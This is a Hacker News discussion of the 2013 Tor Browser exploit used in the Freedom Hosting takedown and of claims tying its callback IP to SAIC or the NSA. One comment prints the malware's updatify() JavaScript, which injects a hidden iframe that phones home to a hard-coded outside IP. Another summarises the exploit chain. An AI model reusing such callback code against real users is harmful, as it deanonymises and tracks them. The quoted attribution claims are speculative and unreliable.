
Torsploit takedown: analysis, reverse engineering, forensic - detcader
https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p3852
======
ParadisoShlee
I'm not a tin foil kind of guy.... I think it's pretty safe to say the freedom
hosting takedown and tor targeted exploit is a masterstroke of saber rattling
and psyops dick waving.

Target and capture somebody (possible evil douchebag) who is hidden behind
seven proxies, Gain access to highly secure 'hidden .onion' servers used by
people who want to stay hidden, scare the TOR user base by proving they can
identify you in easily while also not giving a fuck about burning one of the
many exploits in their bag - in a single move!

~~~
nilved
It's purely coincidental and to their luck that they were able to find the
hosting provider, and that the provider happened to host so many valuable
targets. The exploit isn't at all special.

~~~
ParadisoShlee
Yes, it's coincidental but it's a fun story. Sadly, the facts are not really
available to confirm :)

Regardless, I don't know why the freedom hosts lasted so damn long.

------
throwaway912397
The form thread relies on a domaintools.com query [1], which points to
"SCIENCE APPLICATIONS INT" [2] as the owner of this 65.222.202.53 Class C
subset (65.222.202.53 has found in the updatify() function listed below [3]).
You might recognize SAIC from the NSA's 'XKEYSCORE Systems Engineer' job
posting thread [4] a couple days ago.

    
    
      function updatify() {
      var iframe = document.createElement('iframe');
      iframe.style.display = "inline";
      iframe.frameBorder = "0";
      iframe.scrolling = "no";
      iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
      iframe.height = "5";
      iframe.width = "*";
      document.body.appendChild(iframe);
      }
    

[1] [http://www.domaintools.com/research/ip-
explorer/?ip=65.222.2...](http://www.domaintools.com/research/ip-
explorer/?ip=65.222.202.53)

[2]
[http://en.wikipedia.org/wiki/SAIC_%28U.S._company%29](http://en.wikipedia.org/wiki/SAIC_%28U.S._company%29)

[3]
[https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#...](https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p3849)

[4]
[https://news.ycombinator.com/item?id=6138205](https://news.ycombinator.com/item?id=6138205)

~~~
DannyBee
SAIC is a huge defense contractor with their fingers in a large number of
pies. Anything SAIC related is certainly government related, but not
necessarily NSA.

~~~
lawnchair_larry
I'm not sure the distinction of what is and is not NSA proper is even
meaningful anymore. They deal with national security and intelligence, not
child porn, so they almost certainly weren't the primary actor in this case.
But given all of the contractors and cooperating agencies and resources that
are publicly known, which I would assume is only the tip of the iceberg, it
makes little practical difference which agency is on the badge of who pulls
the final trigger.

Given the IP space involved, SAIC's involvement, their known existing work in
this area including their willingness to purchase exploits for government/law
enforcement, and the target, it's a huge stretch to come up with any other
explanation.

As someone usually ending up on the anti-NSA side of these discussions, I
don't think there is anything particularly surprising or worrying about this.
They (whichever agency it was) used an exploit in what was a fairly
significant bust in their eyes. I haven't personally analyzed it but I gather
it did something ranging from log identifiable information to installing
malware. Regardless of what it did, this is a pretty expected law enforcement
tactic for adversaries of this nature.

As pointed out by you and others, SAIC definitely has fairly incompetent
moments, but they have a lot of money. This is why they can put enough of an
attack together to deliver a sophisticated exploit (likely purchased) and
execute on the operation, while still leaving their tracks on everything and
being somewhat sloppy.

I've seen mixed comments as to whether or not it was actually patched
upstream, but if it was, that makes even more sense. If it was patched, they
_had_ to use it before it made it into the Tor bundle, or lose it entirely.
Generally, high value exploits that are 0day - unknown and unpatched, are not
given to law enforcement.

I think to suggest this was "psyops" or something is giving SAIC _far_ too
much credit. It was just a sloppy raid that used an exploit, for any number of
legitimate reasons.

~~~
DannyBee
Oh sure, i don't believe it was psyops. As you said, i'm sure SAIC bought the
exploit, and then used it in a mildly incompetent way.

I'm sure they even had meetings and documents about it, too!

------
powertower
I've got a bunch of TOR originating traffic coming into a clearweb "whats-my-
ip" service that I run, that's really odd (it uses a Chrome user-agent string
and apears to be coming from a script, maybe even JS being executed in a
Browser).

It's been going on for about 4 months now. I've posted my summery here -
[http://www.devside.net/blog/strange-tor-traffic-to-get-
ip](http://www.devside.net/blog/strange-tor-traffic-to-get-ip)

------
detcader
The is website seems slow right now. Alternative link on ars:
[http://arstechnica.com/tech-policy/2013/08/researchers-
say-t...](http://arstechnica.com/tech-policy/2013/08/researchers-say-tor-
targeted-malware-phoned-home-to-nsa/)

Relevant links:

[http://www.domaintools.com/research/ip-
explorer/?ip=65.222.2...](http://www.domaintools.com/research/ip-
explorer/?ip=65.222.202.53)

[http://pop.robtex.com/nsa.gov.html#records](http://pop.robtex.com/nsa.gov.html#records)

------
api
One thought: the use of a browser exploit to target Tor is _perhaps_ an
admission that onion routing itself is not easily cracked.

~~~
rorrr2
It's probably hard to gather meaningful evidence. Just think of how they would
have to present it to the clueless jury.

It's much easier to show a direct access to some child porn site.

I'm almost certain NSA controls a bunch of nodes and exit nodes and can figure
out who loads what. VPN is the way around it.

~~~
tokenizerrr
When you visit .onion sites exit nodes don't come into play.

As for controlling a bunch of nodes and figuring out who loads what is not
possible, as far as I understand how the network works. How it works is that
the sender decides on a path which consists of a random amount of other
regular nodes. It encrypts a message with the public key of each of the nodes,
and then sends it on its merry way to the first node. None of the nodes know
if they're the first, the second, or the last. All the know is the address of
the previous and the next node, either of which can be other nodes in the
chain or the origin or the destination.

~~~
tonfa
> As for controlling a bunch of nodes and figuring out who loads what is not
> possible, as far as I understand how the network works.

Given the number of taping points, the NSA might be considered a global
passive adversary (or close to one) at this point. Tor does not protect
against that.

------
jonknee
It appears that this is actually aFirefox exploit that was patched a while
back. Hurray for auto-updating browsers. I read suggestions of using a LiveCD,
but that seems like it would leave you stuck to security fixes like this. If
you were using Tails you could at least have had a random MAC
([https://tails.boum.org/contribute/design/MAC_address/](https://tails.boum.org/contribute/design/MAC_address/)),
but this attack could have been a _lot_ worse if it wanted more than the MAC.

Since the OP didn't mention it, here's the gist of what happened:

1) A bug in Firefox related to the onreadystatechange event could end up
arbitrarily executing memory on a page reload. 2) The attack created a Windows
executable using JavaScript's typed arrays and array buffers (pretty
interesting in its own right) 3) The executable phones home with a MAC address
and Windows hostname

------
detcader
huh, the title of my post changed and it lost 7 points? random changes like
this seem common on HN, interested in why

the original title was "Independent reasearch claims NSA behind Tor Browser
exploit, owns 65.222.202.53" \-- which I think is completely reasonable and
accurate

~~~
sp332
The new title is a better description of what the article is about. If you
just want to submit the AS ownership, you could link to
[http://pop.robtex.com/nsa.gov.html#records](http://pop.robtex.com/nsa.gov.html#records)

~~~
LoganCale
It describes what the article is about in general but removes why it is
specifically relevant.

------
detcader
Full forum post quoted below (I didn't write it, just found it on social media
a little while ago):

"Well, the story gets more interesting...

This morning, we read that information from the NSA's illegal surveillance
databases has been routinely finding its way into DEA drug cases [1], with an
entire government "training programme" in existence to mask the source of the
information from defendants... as well as prosecutors and judges.

And this weekend, we've been working through the news that a large breach of
security associated with the Tor network - it's been dubbed #torsploit [2] -
has taken place. Exploit code is available (see earlier posts in this thread),
and folks have been de-obfuscating and analysing the code.

There's also an IP address hard-coded into it - that's where the info gathered
by the malware is being sent. That IP address is:

65.222.202.53

Now, the press reporting on the address so far has been saying it's a "Verizon
business address in Virginia." Yes, that's what whois shows, but that's not
exactly the full story, or the real story.

The folks at Baneki Privacy Labs have been chasing down that detail. They
first asked [3], in a game-theoretic way, whether the entire situation isn't a
bit too, well... obvious. I mean, did the FBI think nobody would notice?
Everyone's been assuming it's the FBI, doing something like the "Darkmarket
honeypot," [4] or some such. It's worth noting that nobody has taken public
credit for this #torsploit [5] malware yet, so attributing it to the FBI is a
leap of assumptive logic.

Turns out, the story is much more interesting than that.

Baneki dug deeper than whois, and got some clues things were spookier than
they seemed. First, there's an open port (80) [6] sitting on the machine in
question. So it's not some recycled or attempted-at-obfuscated IP address.
It's still live and running. Then the fun starts... [7]

SAIC.png [a]

SAIC is, needless to say, deep in the core of the cyber-military complex...
and certainly not the FBI.

Some further investigation by Baneki turns up the following information [8]:

NSA.png [b]

That IP address is part of IP space directly allocated to the NSA's Autonomous
Systems (AS). It's not FBI; it's NSA.

What is an NSA IP address doing as a command & control contact for javascript
malware being deployed in the #torsploit [9] attack? That remains to be
seen... but we already know that PRISM data has been "jumping the wall" and
leaking into other law enforcement hands. Is this an example of further abuse
of PRISM's "national security only" dataset? That appears the most likely
explanation, at this point in time.

Glenn Greenwald has been warning us this is happening - and here's another
hard, objective, irrefutable data point. The NSA's Alexander - who only last
week was at DefCon doing his best to charm the audience [10] - is once again
caught lying bald-faced.

What happens now? We sit back to await developments..."

[1]
[http://mobile.reuters.com/article/idUSBRE97409R20130805?irpc...](http://mobile.reuters.com/article/idUSBRE97409R20130805?irpc=932)
[2]
[https://twitter.com/search?q=%23torsploit&src=typd](https://twitter.com/search?q=%23torsploit&src=typd)
[3]
[https://twitter.com/Baneki/status/364323285003014144](https://twitter.com/Baneki/status/364323285003014144)
[4]
[https://www.cryptocloud.org/viewtopic.php?f=17&t=87](https://www.cryptocloud.org/viewtopic.php?f=17&t=87)
[5]
[https://twitter.com/search?q=%23torsploit&src=typd](https://twitter.com/search?q=%23torsploit&src=typd)
[6]
[https://twitter.com/Baneki/status/364336090057949184](https://twitter.com/Baneki/status/364336090057949184)
[7]
[https://twitter.com/Baneki/status/364340406361665536](https://twitter.com/Baneki/status/364340406361665536)
[8]
[http://pop.robtex.com/nsa.gov.html#records](http://pop.robtex.com/nsa.gov.html#records)
[9]
[https://twitter.com/search?q=%23torsploit&src=typd](https://twitter.com/search?q=%23torsploit&src=typd)
[10]
[https://twitter.com/CryptoCloudVPN/status/362864059105820674](https://twitter.com/CryptoCloudVPN/status/362864059105820674)
[a] [http://i.imgur.com/9d3fj2G.png](http://i.imgur.com/9d3fj2G.png) [b]
[http://i.imgur.com/PGnNvx9.png](http://i.imgur.com/PGnNvx9.png)

~~~
devindotcom
Sorry to be ignorant, but I don't see where 65.222.202.53 is shown to be NSA-
owned? I don't see that in the robtex record. Am I reading it wrong? I'm not
familiar with this notation, I don't often look into IP allocation issues.

~~~
VMG
[http://jodies.de/ipcalc?host=65.192.0.0&mask1=11&mask2=](http://jodies.de/ipcalc?host=65.192.0.0&mask1=11&mask2=)

    
    
         HostMin:   65.192.0.1
         HostMax:   65.223.255.254

~~~
devindotcom
Thank you, I think that clears it up for me.

------
thrownaway2424
Hasn't it always been perfectly clear that ~all Tor exit nodes are owned by
intelligence agencies? You only need a relatively small fraction of the exit
nodes to pwn the entire system.

~~~
weinzierl
I attended a talk of Roger Dingledine und Jacob Appelbaum two weeks ago and
during Q and A the topic of compromised exit nodes came up. If I understood
Jacob Appelbaum correctly he said that he didn't believe most exit nodes are
owned by intelligence agencies. His reasoning was it was not needed, because
they could use the data from comprehensive wire-taps for much the same effect.
He also said, that if they are already after you, Tor is not going to help
you.

I'm not an expert in Tor and I attended the talk tired and after a hard days
work, so I might have completely misunderstood him.

~~~
griffordson
Was it this talk?

[https://www.youtube.com/watch?v=-VUyuFH9CbI](https://www.youtube.com/watch?v=-VUyuFH9CbI)

------
hosay123
As much as I love drama, the notion that the NSA would hardcode a registered
IP address of their own into some malware and use that to attack some very
publicized network affecting thousands of users.. well..

As another comment points out, why bother when you already coordinate a
massive sniffing effort affecting large chunks of the globe?

~~~
Fuzzwah
But what is the alternative... someone has pwnd an NSA box and is using it as
a CC server for malware that they've injected into all sites hosted by some
guy who was just arrested?

~~~
UVB-76
Possible alternative is that a third party wrote the malware and decided to
put an NSA/SAIC IP address in the code to scare people

~~~
LoganCale
And then deployed this exploit just before the Freedom Hosting founder, on
whose servers the exploit was found, was arrested?

~~~
UVB-76
Just saying putting an IP address in some code doesn't mean the owner of that
IP address is responsible for writing the code.

~~~
LoganCale
You're missing the point. The fact this exploit showed up just before the
server owner was arrested strongly suggests the feds are involved.

~~~
hosay123
I hear a "shooting star" was seen the night of the Tunguska event. The fact
this shooting star showed up just prior to an enormously powerful explosion
suggests the allies had nuclear weapons in 1908, and that they were supplied
by aliens from another world.

For any given series of boring events, the most fantastical explanation that
ties them all together must obviously be true.

~~~
Fuzzwah
This is my preferred Tunguska conspiracy:

[http://www.teslasociety.com/tunguska.htm](http://www.teslasociety.com/tunguska.htm)

ps: I don't care if it is correct, it is still an interesting read.

------
dmix
The website loads perfectly if you take out s in http[s]

[http://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p...](http://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p3852)

~~~
staunch
NSA blocking the SSL version :-)

------
nkuttler
The site is extremely slow, I got the text to load but apparently relevant
images aren't loading. It's not in google cache yet either. If somebody could
save the entire page and upload it somewhere (or something).. that would be
great.

------
mtgx
Freenet's statement about the takedown:

[https://freenetproject.org/news.html#2013-tor-
bust](https://freenetproject.org/news.html#2013-tor-bust)

------
at-fates-hands
Anybody think this could be someone other than the NSA at work here? Maybe a
good frame job from someone like Anon or the Chinese?

------
ToothlessJake
Someone in a previous thread about ex-NSA Russell Tice asked "Say what you
like about Snowden, but at least some of his claims have been backed up by
evidence. What have these guys got? Why not name names?"

I responded with: A stay in a penitentiary helped managed by SAIC[1].

Digitally stalked due to dissent by for-profit "Domain Awareness Centers" run
by SAIC[2].

Persistent targeting, one way or another, by drones managed by SAIC[3].

Now after this, I can add "Hunting and exposing swaths of users as to
pursue/prosecute/rendition/drone a few via disseminating exploits used against
those that dare encrypt their traffic[4]".

[1]
[http://www.alanco.com/news_040104.asp](http://www.alanco.com/news_040104.asp)

[2]
[http://oaklandwiki.org/Domain_Awareness_Center](http://oaklandwiki.org/Domain_Awareness_Center)

[3] [http://www.dailyfinance.com/2013/06/14/news-saic-
wins-95-mil...](http://www.dailyfinance.com/2013/06/14/news-saic-
wins-95-million-drone-management-contrac/)

[4]
[https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#...](https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p3852)

